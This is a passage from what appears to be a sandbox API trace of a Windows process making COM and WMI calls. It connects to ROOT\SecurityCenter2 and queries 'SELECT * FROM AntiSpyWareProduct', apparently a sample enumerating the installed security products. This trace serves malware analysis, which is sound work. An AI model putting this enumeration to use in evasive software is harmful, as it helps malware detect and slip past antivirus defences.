mshlflags=0x0, pCid=0x19e318 | out: pCid=0x19e318*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.478] WbemDefPath:IUnknown:Release (This=0x5544de0) returned 0x3 [0266.478] CoGetContextToken (in: pToken=0x19e370 | out: pToken=0x19e370) returned 0x0 [0266.478] CoGetContextToken (in: pToken=0x19e778 | out: pToken=0x19e778) returned 0x0 [0266.478] WbemDefPath:IUnknown:QueryInterface (in: This=0x55425f0, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e808 | out: ppvObject=0x19e808*=0x0) returned 0x80004002 [0266.479] WbemDefPath:IUnknown:Release (This=0x55425f0) returned 0x2 [0266.479] WbemDefPath:IUnknown:Release (This=0x55425f0) returned 0x1 [0266.479] CoGetContextToken (in: pToken=0x19f100 | out: pToken=0x19f100) returned 0x0 [0266.479] CoGetContextToken (in: pToken=0x19f060 | out: pToken=0x19f060) returned 0x0 [0266.479] WbemDefPath:IUnknown:QueryInterface (in: This=0x55425f0, riid=0x19f130*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f12c | out: ppvObject=0x19f12c*=0x55425f0) returned 0x0 [0266.479] WbemDefPath:IUnknown:AddRef (This=0x55425f0) returned 0x3 [0266.479] WbemDefPath:IUnknown:Release (This=0x55425f0) returned 0x2 [0266.479] WbemDefPath:IWbemPath:SetText (This=0x55425f0, uMode=0x4, pszPath="ROOT\\SecurityCenter2") returned 0x0 [0266.479] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x55425f0, puCount=0x19f2b0 | out: puCount=0x19f2b0*=0x2) returned 0x0 [0266.479] WbemDefPath:IWbemPath:GetText (in: This=0x55425f0, lFlags=4, puBuffLength=0x19f2ac*=0x0, pszText=0x0 | out: puBuffLength=0x19f2ac*=0x19, pszText=0x0) returned 0x0 [0266.479] WbemDefPath:IWbemPath:GetText (in: This=0x55425f0, lFlags=4, puBuffLength=0x19f2ac*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f2ac*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.479] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x55425f0, puCount=0x19f29c | out: puCount=0x19f29c*=0x2) returned 0x0 [0266.479] WbemDefPath:IWbemPath:GetText (in: This=0x55425f0, lFlags=4, puBuffLength=0x19f298*=0x0, pszText=0x0 | out: puBuffLength=0x19f298*=0x19, pszText=0x0) returned 0x0 [0266.479] WbemDefPath:IWbemPath:GetText (in: This=0x55425f0, lFlags=4, puBuffLength=0x19f298*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f298*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.479] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f230 | out: ppv=0x19f230*=0x601a94) returned 0x0 [0266.479] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f228 | out: pAptType=0x19f228*=1) returned 0x0 [0266.479] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f22c | out: ppvObject=0x19f22c*=0x0) returned 0x80004002 [0266.479] IUnknown:Release (This=0x601a94) returned 0x1 [0266.480] CoGetClassObject (in: rclsid=0x6bdd2c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ee50 | out: ppv=0x19ee50*=0x5544d20) returned 0x0 [0266.480] WbemLocator:IUnknown:QueryInterface (in: This=0x5544d20, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19f068 | out: ppvObject=0x19f068*=0x0) returned 0x80004002 [0266.480] WbemLocator:IClassFactory:CreateInstance (in: This=0x5544d20, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f07c | out: ppvObject=0x19f07c*=0x54ba408) returned 0x0 [0266.480] WbemLocator:IUnknown:Release (This=0x5544d20) returned 0x0 [0266.480] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba408, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec9c | out: ppvObject=0x19ec9c*=0x54ba408) returned 0x0 [0266.480] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba408, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec58 | out: ppvObject=0x19ec58*=0x0) returned 0x80004002 [0266.480] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba408, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e84c | out: ppvObject=0x19e84c*=0x0) returned 0x80004002 [0266.481] WbemLocator:IUnknown:AddRef (This=0x54ba408) returned 0x3 [0266.481] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba408, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e5b4 | out: ppvObject=0x19e5b4*=0x0) returned 0x80004002 [0266.481] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba408, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e564 | out: ppvObject=0x19e564*=0x0) returned 0x80004002 [0266.481] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba408, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e570 | out: ppvObject=0x19e570*=0x0) returned 0x80004002 [0266.481] CoGetContextToken (in: pToken=0x19e5d0 | out: pToken=0x19e5d0) returned 0x0 [0266.481] CoGetContextToken (in: pToken=0x19e9d8 | out: pToken=0x19e9d8) returned 0x0 [0266.481] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba408, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea68 | out: ppvObject=0x19ea68*=0x0) returned 0x80004002 [0266.481] WbemLocator:IUnknown:Release (This=0x54ba408) returned 0x2 [0266.481] WbemLocator:IUnknown:Release (This=0x54ba408) returned 0x1 [0266.481] CoGetContextToken (in: pToken=0x19f048 | out: pToken=0x19f048) returned 0x0 [0266.481] CoGetContextToken (in: pToken=0x19efa8 | out: pToken=0x19efa8) returned 0x0 [0266.481] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba408, riid=0x19f078*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19f074 | out: ppvObject=0x19f074*=0x54ba408) returned 0x0 [0266.481] WbemLocator:IUnknown:AddRef (This=0x54ba408) returned 0x3 [0266.481] WbemLocator:IUnknown:Release (This=0x54ba408) returned 0x2 [0266.481] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x55425f0, puCount=0x19f20c | out: puCount=0x19f20c*=0x2) returned 0x0 [0266.481] WbemDefPath:IWbemPath:GetText (in: This=0x55425f0, lFlags=8, puBuffLength=0x19f208*=0x0, pszText=0x0 | out: puBuffLength=0x19f208*=0x19, pszText=0x0) returned 0x0 [0266.481] WbemDefPath:IWbemPath:GetText (in: This=0x55425f0, lFlags=8, puBuffLength=0x19f208*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f208*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.481] CoCreateInstance (in: rclsid=0x6d3c1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d3c12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x19f0d0 | out: ppv=0x19f0d0*=0x54ba548) returned 0x0 [0266.482] WbemLocator:IWbemLocator:ConnectServer (in: This=0x54ba548, strNetworkResource="\\\\.\\ROOT\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x19f178 | out: ppNamespace=0x19f178*=0x54b5130) returned 0x0 [0266.501] WbemLocator:IUnknown:QueryInterface (in: This=0x54b5130, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f000 | out: ppvObject=0x19f000*=0x66f94c) returned 0x0 [0266.502] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66f94c, pProxy=0x54b5130, pAuthnSvc=0x19f050, pAuthzSvc=0x19f04c, pServerPrincName=0x19f044, pAuthnLevel=0x19f048, pImpLevel=0x19f038, pAuthInfo=0x19f03c, pCapabilites=0x19f040 | out: pAuthnSvc=0x19f050*=0xa, pAuthzSvc=0x19f04c*=0x0, pServerPrincName=0x19f044, pAuthnLevel=0x19f048*=0x6, pImpLevel=0x19f038*=0x2, pAuthInfo=0x19f03c, pCapabilites=0x19f040*=0x1) returned 0x0 [0266.502] WbemLocator:IUnknown:Release (This=0x66f94c) returned 0x1 [0266.502] WbemLocator:IUnknown:QueryInterface (in: This=0x54b5130, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eff4 | out: ppvObject=0x19eff4*=0x66f970) returned 0x0 [0266.502] WbemLocator:IUnknown:QueryInterface (in: This=0x54b5130, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eff0 | out: ppvObject=0x19eff0*=0x66f94c) returned 0x0 [0266.502] WbemLocator:IClientSecurity:SetBlanket (This=0x66f94c, pProxy=0x54b5130, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.502] WbemLocator:IUnknown:Release (This=0x66f94c) returned 0x2 [0266.502] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x1 [0266.502] CoTaskMemFree (pv=0x54bc4d8) [0266.502] WbemLocator:IUnknown:Release (This=0x54ba548) returned 0x0 [0266.503] WbemLocator:IUnknown:QueryInterface (in: This=0x54b5130, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebf0 | out: ppvObject=0x19ebf0*=0x66f970) returned 0x0 [0266.503] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ebac | out: ppvObject=0x19ebac*=0x0) returned 0x80004002 [0266.504] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e9cc | out: ppvObject=0x19e9cc*=0x0) returned 0x80004002 [0266.504] WbemLocator:IUnknown:QueryInterface (in: This=0x54b5130, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e7a4 | out: ppvObject=0x19e7a4*=0x0) returned 0x80004002 [0266.505] WbemLocator:IUnknown:AddRef (This=0x66f970) returned 0x3 [0266.505] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e50c | out: ppvObject=0x19e50c*=0x0) returned 0x80004002 [0266.505] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e4bc | out: ppvObject=0x19e4bc*=0x0) returned 0x80004002 [0266.505] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e4c8 | out: ppvObject=0x19e4c8*=0x66f8cc) returned 0x0 [0266.505] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66f8cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e4d0 | out: pCid=0x19e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.505] WbemLocator:IUnknown:Release (This=0x66f8cc) returned 0x3 [0266.505] CoGetContextToken (in: pToken=0x19e528 | out: pToken=0x19e528) returned 0x0 [0266.505] CoGetContextToken (in: pToken=0x19e930 | out: pToken=0x19e930) returned 0x0 [0266.505] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9c0 | out: ppvObject=0x19e9c0*=0x66f954) returned 0x0 [0266.506] WbemLocator:IRpcOptions:Query (in: This=0x66f954, pPrx=0x66f970, dwProperty=2, pdwValue=0x19e9e8 | out: pdwValue=0x19e9e8) returned 0x80004002 [0266.506] WbemLocator:IUnknown:Release (This=0x66f954) returned 0x3 [0266.506] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x2 [0266.506] CoGetContextToken (in: pToken=0x19ef00 | out: pToken=0x19ef00) returned 0x0 [0266.506] CoGetContextToken (in: pToken=0x19ee60 | out: pToken=0x19ee60) returned 0x0 [0266.506] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x19ef30*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19ef2c | out: ppvObject=0x19ef2c*=0x54b5130) returned 0x0 [0266.506] WbemLocator:IUnknown:AddRef (This=0x54b5130) returned 0x4 [0266.506] WbemLocator:IUnknown:Release (This=0x54b5130) returned 0x3 [0266.506] WbemLocator:IUnknown:Release (This=0x54b5130) returned 0x2 [0266.506] SysStringLen (param_1=0x0) returned 0x0 [0266.507] CoGetContextToken (in: pToken=0x19ef10 | out: pToken=0x19ef10) returned 0x0 [0266.507] WbemLocator:IUnknown:AddRef (This=0x66f970) returned 0x3 [0266.507] WbemLocator:IUnknown:QueryInterface (in: This=0x66f970, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eda4 | out: ppvObject=0x19eda4*=0x66f970) returned 0x0 [0266.507] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x3 [0266.507] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x2 [0266.507] CoGetContextToken (in: pToken=0x19f000 | out: pToken=0x19f000) returned 0x0 [0266.507] WbemLocator:IUnknown:AddRef (This=0x54b5130) returned 0x3 [0266.507] IWbemServices:ExecQuery (in: This=0x54b5130, strQueryLanguage="WQL", strQuery="SELECT * FROM AntiSpyWareProduct", lFlags=16, pCtx=0x0, ppEnum=0x19f214 | out: ppEnum=0x19f214*=0x663398) returned 0x0 [0266.518] IUnknown:QueryInterface (in: This=0x663398, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f074 | out: ppvObject=0x19f074*=0x66339c) returned 0x0 [0266.518] IClientSecurity:QueryBlanket (in: This=0x66339c, pProxy=0x663398, pAuthnSvc=0x19f0c4, pAuthzSvc=0x19f0c0, pServerPrincName=0x19f0b8, pAuthnLevel=0x19f0bc, pImpLevel=0x19f0ac, pAuthInfo=0x19f0b0, pCapabilites=0x19f0b4 | out: pAuthnSvc=0x19f0c4*=0xa, pAuthzSvc=0x19f0c0*=0x0, pServerPrincName=0x19f0b8, pAuthnLevel=0x19f0bc*=0x6, pImpLevel=0x19f0ac*=0x2, pAuthInfo=0x19f0b0, pCapabilites=0x19f0b4*=0x1) returned 0x0 [0266.518] IUnknown:Release (This=0x66339c) returned 0x1 [0266.518] IUnknown:QueryInterface (in: This=0x663398, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f068 | out: ppvObject=0x19f068*=0x66ff70) returned 0x0 [0266.518] IUnknown:QueryInterface (in: This=0x663398, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f064 | out: ppvObject=0x19f064*=0x66339c) returned 0x0 [0266.518] IClientSecurity:SetBlanket (This=0x66339c, pProxy=0x663398, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0266.520] IUnknown:Release (This=0x66339c) returned 0x2 [0266.520] WbemLocator:IUnknown:Release (This=0x66ff70) returned 0x1 [0266.520] CoTaskMemFree (pv=0x54bc658) [0266.520] IUnknown:QueryInterface (in: This=0x663398, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec60 | out: ppvObject=0x19ec60*=0x66ff70) returned 0x0 [0266.520] WbemLocator:IUnknown:QueryInterface (in: This=0x66ff70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec1c | out: ppvObject=0x19ec1c*=0x0) returned 0x80004002 [0266.521] WbemLocator:IUnknown:QueryInterface (in: This=0x66ff70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ea3c | out: ppvObject=0x19ea3c*=0x0) returned 0x80004002 [0266.521] IUnknown:QueryInterface (in: This=0x663398, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e814 | out: ppvObject=0x19e814*=0x0) returned 0x80004002 [0266.522] WbemLocator:IUnknown:AddRef (This=0x66ff70) returned 0x3 [0266.522] WbemLocator:IUnknown:QueryInterface (in: This=0x66ff70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e57c | out: ppvObject=0x19e57c*=0x0) returned 0x80004002 [0266.522] WbemLocator:IUnknown:QueryInterface (in: This=0x66ff70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e52c | out: ppvObject=0x19e52c*=0x0) returned 0x80004002 [0266.522] WbemLocator:IUnknown:QueryInterface (in: This=0x66ff70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e538 | out: ppvObject=0x19e538*=0x66fecc) returned 0x0 [0266.522] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66fecc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e540 | out: pCid=0x19e540*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0266.522] WbemLocator:IUnknown:Release (This=0x66fecc) returned 0x3 [0266.522] CoGetContextToken (in: pToken=0x19e598 | out: pToken=0x19e598) returned 0x0 [0266.522] CoGetContextToken (in: pToken=0x19e9a0 | out: pToken=0x19e9a0) returned 0x0 [0266.522] WbemLocator:IUnknown:QueryInterface (in: This=0x66ff70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea30 | out: ppvObject=0x19ea30*=0x66ff54) returned 0x0 [0266.522] WbemLocator:IRpcOptions:Query (in: This=0x66ff54, pPrx=0x66ff70, dwProperty=2, pdwValue=0x19ea58 | out: pdwValue=0x19ea58) returned 0x80004002 [0266.522] WbemLocator:IUnknown:Release (This=0x66ff54) returned 0x3 [0266.522] WbemLocator:IUnknown:Release (This=0x66ff70) returned 0x2 [0266.523] CoGetContextToken (in: pToken=0x19ef70 | out: pToken=0x19ef70) returned 0x0 [0266.523] CoGetContextToken (in: pToken=0x19eed0 | out: pToken=0x19eed0) returned 0x0 [0266.523] WbemLocator:IUnknown:QueryInterface (in: This=0x66ff70, riid=0x19efa0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19ef9c | out: ppvObject=0x19ef9c*=0x663398) returned 0x0 [0266.523] IUnknown:AddRef (This=0x663398) returned 0x4 [0266.523] IUnknown:Release (This=0x663398) returned 0x3 [0266.523] IUnknown:Release (This=0x663398) returned 0x2 [0266.523] WbemLocator:IUnknown:Release (This=0x54b5130) returned 0x2 [0266.523] SysStringLen (param_1=0x0) returned 0x0 [0266.523] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x55425f0, puCount=0x19f260 | out: puCount=0x19f260*=0x2) returned 0x0 [0266.523] WbemDefPath:IWbemPath:GetText (in: This=0x55425f0, lFlags=4, puBuffLength=0x19f25c*=0x0, pszText=0x0 | out: puBuffLength=0x19f25c*=0x19, pszText=0x0) returned 0x0 [0266.523] WbemDefPath:IWbemPath:GetText (in: This=0x55425f0, lFlags=4, puBuffLength=0x19f25c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x19f25c*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0266.523] CoGetContextToken (in: pToken=0x19f0b0 | out: pToken=0x19f0b0) returned 0x0 [0266.523] IUnknown:AddRef (This=0x663398) returned 0x3 [0266.523] IEnumWbemClassObject:Clone (in: This=0x663398, ppEnum=0x19f26c | out: ppEnum=0x19f26c*=0x663528) returned 0x0 [0266.524] IUnknown:QueryInterface (in: This=0x663528, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f130 | out: ppvObject=0x19f130*=0x66352c) returned 0x0 [0266.524] IClientSecurity:QueryBlanket (in: This=0x66352c, pProxy=0x663528, pAuthnSvc=0x19f180, pAuthzSvc=0x19f17c, pServerPrincName=0x19f174, pAuthnLevel=0x19f178, pImpLevel=0x19f168, pAuthInfo=0x19f16c, pCapabilites=0x19f170 | out: pAuthnSvc=0x19f180*=0xa, pAuthzSvc=0x19f17c*=0x0, pServerPrincName=0x19f174, pAuthnLevel=0x19f178*=0x6, pImpLevel=0x19f168*=0x2, pAuthInfo=0x19f16c, pCapabilites=0x19f170*=0x1) returned 0x0 [0266.525] IUnknown:Release (This=0x66352c) returned 0x1 [0266.525] IUnknown:QueryInterface (in: This=0x663528, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f124 | out: ppvObject=0x19f124*=0x66fe70) returned 0x0 [0266.525] IUnknown:QueryInterface (in: This=0x663528, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f120 | out: ppvObject=0x19f120*=0x66352c) returned 0x0 [0266.525] IClientSecurity:SetBlanket (This=0x66352c, 